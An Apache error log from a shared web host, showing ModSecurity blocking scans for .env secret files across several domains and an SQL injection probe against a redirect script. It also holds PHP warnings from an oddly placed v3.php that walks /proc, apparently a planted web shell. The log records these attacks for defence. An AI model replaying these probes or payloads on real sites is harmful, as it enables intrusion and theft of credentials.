[Tue May 12 01:41:27.160204 2026] [security2:error] [pid 1695975:tid 1695986] [client 43.162.109.249:34098] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJpJ9VI9ymHBxup7498PAAAAIg"]
[Tue May 12 01:41:36.953782 2026] [security2:error] [pid 1707624:tid 1707694] [client 170.106.163.48:34254] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/hirondelle/"] [unique_id "agJpMLOxS7i6i_mT2NK3gwAAAEw"]
[Tue May 12 01:41:52.983855 2026] [security2:error] [pid 1707624:tid 1707687] [client 176.65.139.238:50174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQLOxS7i6i_mT2NK3ygAAAEU"]
[Tue May 12 01:41:52.984083 2026] [security2:error] [pid 1707624:tid 1707687] [client 176.65.139.238:50174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQLOxS7i6i_mT2NK3ygAAAEU"]
[Tue May 12 01:41:52.987582 2026] [security2:error] [pid 1707624:tid 1707687] [client 176.65.139.238:50174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQLOxS7i6i_mT2NK3ygAAAEU"]
[Tue May 12 01:41:53.098207 2026] [security2:error] [pid 1709071:tid 1709099] [client 176.65.139.237:45108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bender.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQbvMumyrWMfSu7qYbwAAAMw"]
[Tue May 12 01:41:53.098398 2026] [security2:error] [pid 1709071:tid 1709099] [client 176.65.139.237:45108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.bender.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQbvMumyrWMfSu7qYbwAAAMw"]
[Tue May 12 01:41:53.099415 2026] [security2:error] [pid 1709071:tid 1709099] [client 176.65.139.237:45108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.bender.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQbvMumyrWMfSu7qYbwAAAMw"]
[Tue May 12 01:41:53.123479 2026] [security2:error] [pid 1630927:tid 1630942] [client 176.65.139.238:50178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.flb.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQWiGYYhUwDaJINnT5gAAAUw"]
[Tue May 12 01:41:53.123644 2026] [security2:error] [pid 1630927:tid 1630942] [client 176.65.139.238:50178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.flb.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQWiGYYhUwDaJINnT5gAAAUw"]
[Tue May 12 01:41:53.123862 2026] [security2:error] [pid 1630927:tid 1630942] [client 176.65.139.238:50178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.flb.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJpQWiGYYhUwDaJINnT5gAAAUw"]
[Tue May 12 01:41:57.176793 2026] [ssl:error] [pid 1630927:tid 1630945] (EAI 2)Name or service not known: [client 47.128.31.132:28832] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 01:41:57.176846 2026] [ssl:error] [pid 1630927:tid 1630945] AH01941: stapling_renew_response: responder error
[Tue May 12 01:42:03.569570 2026] [security2:error] [pid 1630927:tid 1630953] [client 176.65.139.229:39788] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agJpS2iGYYhUwDaJINnT9gAAAVc"]
[Tue May 12 01:42:03.569797 2026] [security2:error] [pid 1630927:tid 1630953] [client 176.65.139.229:39788] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agJpS2iGYYhUwDaJINnT9gAAAVc"]
[Tue May 12 01:42:03.573513 2026] [core:error] [pid 1630927:tid 1630953] [client 176.65.139.229:39788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:42:03.573761 2026] [security2:error] [pid 1630927:tid 1630953] [client 176.65.139.229:39788] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agJpS2iGYYhUwDaJINnT9gAAAVc"]
[Tue May 12 01:42:03.661680 2026] [security2:error] [pid 1695975:tid 1695997] [client 176.65.139.238:40488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecorporatefinance.com"] [uri "/app/.env"] [unique_id "agJpS9VI9ymHBxup7498gAAAAJM"]
[Tue May 12 01:42:03.661921 2026] [security2:error] [pid 1695975:tid 1695997] [client 176.65.139.238:40488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecorporatefinance.com"] [uri "/app/.env"] [unique_id "agJpS9VI9ymHBxup7498gAAAAJM"]
[Tue May 12 01:42:03.665113 2026] [core:error] [pid 1695975:tid 1695997] [client 176.65.139.238:40488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:42:03.665768 2026] [security2:error] [pid 1695975:tid 1695997] [client 176.65.139.238:40488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecorporatefinance.com"] [uri "/app/.env"] [unique_id "agJpS9VI9ymHBxup7498gAAAAJM"]
[Tue May 12 01:42:03.934038 2026] [security2:error] [pid 1709071:tid 1709091] [client 176.65.139.234:50824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/app/.env"] [unique_id "agJpS7vMumyrWMfSu7qYggAAAMQ"]
[Tue May 12 01:42:03.934260 2026] [security2:error] [pid 1709071:tid 1709091] [client 176.65.139.234:50824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/app/.env"] [unique_id "agJpS7vMumyrWMfSu7qYggAAAMQ"]
[Tue May 12 01:42:03.935252 2026] [core:error] [pid 1709071:tid 1709091] [client 176.65.139.234:50824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:42:03.935824 2026] [security2:error] [pid 1709071:tid 1709091] [client 176.65.139.234:50824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/app/.env"] [unique_id "agJpS7vMumyrWMfSu7qYggAAAMQ"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705076/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705076/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705076/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705076/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705076/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705076/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:42:20.871817 2026] [security2:error] [pid 1709071:tid 1709107] [client 69.164.248.162:54724] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'son),' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: son), found within ARGS:url: 'nvOpzp; AND 1=1 OR (<'\\x22>iKO)),"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJpXLvMumyrWMfSu7qYtAAAANQ"]
[Tue May 12 01:42:20.871997 2026] [security2:error] [pid 1709071:tid 1709107] [client 69.164.248.162:54724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJpXLvMumyrWMfSu7qYtAAAANQ"]
[Tue May 12 01:42:20.872388 2026] [security2:error] [pid 1709071:tid 1709107] [client 69.164.248.162:54724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJpXLvMumyrWMfSu7qYtAAAANQ"]
PHP Warning:  filesize(): stat failed for /proc/3/task/3/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3/task/3/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3/task/3/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3/task/3/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3/task/3/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3/task/3/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:42:49.505290 2026] [core:error] [pid 1709071:tid 1709104] [client 185.191.171.1:52266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:42:49.505329 2026] [core:error] [pid 1709071:tid 1709104] [client 185.191.171.1:52266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:43:43.528520 2026] [security2:error] [pid 1695975:tid 1695980] [client 43.155.27.244:57580] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.com"] [uri "/"] [unique_id "agJpr9VI9ymHBxup7499FQAAAII"]
[Tue May 12 01:44:10.823517 2026] [ssl:error] [pid 1691274:tid 1691289] (EAI 2)Name or service not known: [client 93.123.109.79:57446] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 01:44:10.823565 2026] [ssl:error] [pid 1691274:tid 1691289] AH01941: stapling_renew_response: responder error
[Tue May 12 01:44:10.869678 2026] [ssl:error] [pid 1695975:tid 1696000] (EAI 2)Name or service not known: [client 93.123.109.79:50508] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 01:44:10.869769 2026] [ssl:error] [pid 1695975:tid 1696000] AH01941: stapling_renew_response: responder error
[Tue May 12 01:45:06.164751 2026] [authz_core:error] [pid 1691274:tid 1691288] [client 47.128.125.98:31080] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/error_log
[Tue May 12 01:45:07.482261 2026] [security2:error] [pid 1707624:tid 1707693] [client 5.255.121.146:30024] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agJqA7OxS7i6i_mT2NK5CAAAAEs"]
[Tue May 12 01:45:07.482576 2026] [security2:error] [pid 1707624:tid 1707693] [client 5.255.121.146:30024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agJqA7OxS7i6i_mT2NK5CAAAAEs"]
[Tue May 12 01:45:07.482839 2026] [security2:error] [pid 1707624:tid 1707693] [client 5.255.121.146:30024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agJqA7OxS7i6i_mT2NK5CAAAAEs"]
[Tue May 12 01:45:07.523843 2026] [security2:error] [pid 1707624:tid 1707704] [client 5.255.121.146:30064] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agJqA7OxS7i6i_mT2NK5CQAAAFY"]
[Tue May 12 01:45:07.524002 2026] [security2:error] [pid 1709071:tid 1709098] [client 5.255.121.146:30078] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJqA7vMumyrWMfSu7qZuAAAAMs"]
[Tue May 12 01:45:07.524015 2026] [security2:error] [pid 1707624:tid 1707704] [client 5.255.121.146:30064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agJqA7OxS7i6i_mT2NK5CQAAAFY"]
[Tue May 12 01:45:07.524238 2026] [security2:error] [pid 1709071:tid 1709098] [client 5.255.121.146:30078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJqA7vMumyrWMfSu7qZuAAAAMs"]
[Tue May 12 01:45:07.524523 2026] [security2:error] [pid 1709071:tid 1709098] [client 5.255.121.146:30078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJqA7vMumyrWMfSu7qZuAAAAMs"]
[Tue May 12 01:45:07.524666 2026] [security2:error] [pid 1707624:tid 1707704] [client 5.255.121.146:30064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agJqA7OxS7i6i_mT2NK5CQAAAFY"]
